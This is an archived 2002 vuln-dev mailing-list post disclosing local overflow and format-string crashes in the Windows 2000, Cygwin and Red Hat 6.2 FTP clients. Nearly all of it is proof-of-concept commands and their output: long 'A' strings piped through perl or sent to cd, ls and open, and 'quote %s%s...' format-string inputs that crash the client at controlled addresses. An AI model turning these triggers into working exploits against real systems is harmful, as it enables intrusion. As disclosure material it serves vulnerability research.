Multiple vuln-devLocal Vulnerabilities in some FTP Client. 1. Windows 2000 and other Version FTP Client Overflows and Format String Vulnerability. a. d:\>perl -e "printf 'A'x3000"|ftp Invalid command. ftp> will see the 0x4141414d memory addr not be read erroor. d:\>perl -e "printf 'open '. 'A'x3000"|ftp Already connected to (null), use disconnect first. will see the 0x4141414d memory addr not be read erroor. b. d:\>ftp localhost Connected to lion. 220 lion Microsoft FTP Service (Version 5.0). User (lion:(none)): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 Anonymous user logged in. ftp> debug Debugging On . ftp> cd AAAAAAAAAAˇˇ ('A' x 500) 500 Command was too long 421 Terminating connection. Connection closed by remote host. ftp> debug Debugging On . ftp> open localhost Connected to lion. 220 lion Microsoft FTP Service (Version 5.0). User (lion:(none)): ftp ---> USER ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: ---> PASS f 230 Anonymous user logged in. ftp> cd AAAAAAAAAAAAAAAAˇˇ('A'x 2000) will see the 0x41414141 memory addr not be read erroor. ftp> ls AAAAAAAAAAAAAAAAˇˇ('A'x 2000) ---> PORT 127,0,0,1,4,114 200 PORT command successful. ---> NLST AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAˇˇ.. will see the 0x41414141 memory addr not be read erroor. c. d:\>ftp localhost Connected to lion. 220 lion Microsoft FTP Service (Version 5.0). User (lion:(none)): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 Anonymous user logged in. ftp> debug Debugging On . ftp> quote %s ---> quote %s 500 'QUOTE %s': command not understood ftp> quote %s%s%s ---> quote %s%s%s?(null) 500 'QUOTE %s%s%s (null)': command not understood ftp> quote %s%s%s%s%s%s%s%s ---> will see the 0x73257325 memory addr not be read erroor. Use W32Dasm isamssemble the ftp.exe, we can find the 780127A8 mov dword ptr [eax],ecx This is a character with win2000 Format Strings Vulnerability. 2. Cygwin version 2.194.2.21 and Redhat 6.2 FTP Client Format String Vulnerability. lion@LION ~ $ ftp localhost Connected to lion. 220 lion Microsoft FTP Service (Version 5.0). Name (localhost:lion): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 Anonymous user logged in. Remote system type is Windows_NT. ftp> debug Debugging on (debug=1). ftp> quote %s ---> %s 500 '%S': command not understood ftp> quote %s%s%s%s%s%s%s Segmentation fault (core dumped) Who can exploit it by remote? Sorry for my poor English.:) Lion lionat_private HUC
This archive was generated by hypermail 2b30 : Sun May 05 2002 - 12:47:56 PDT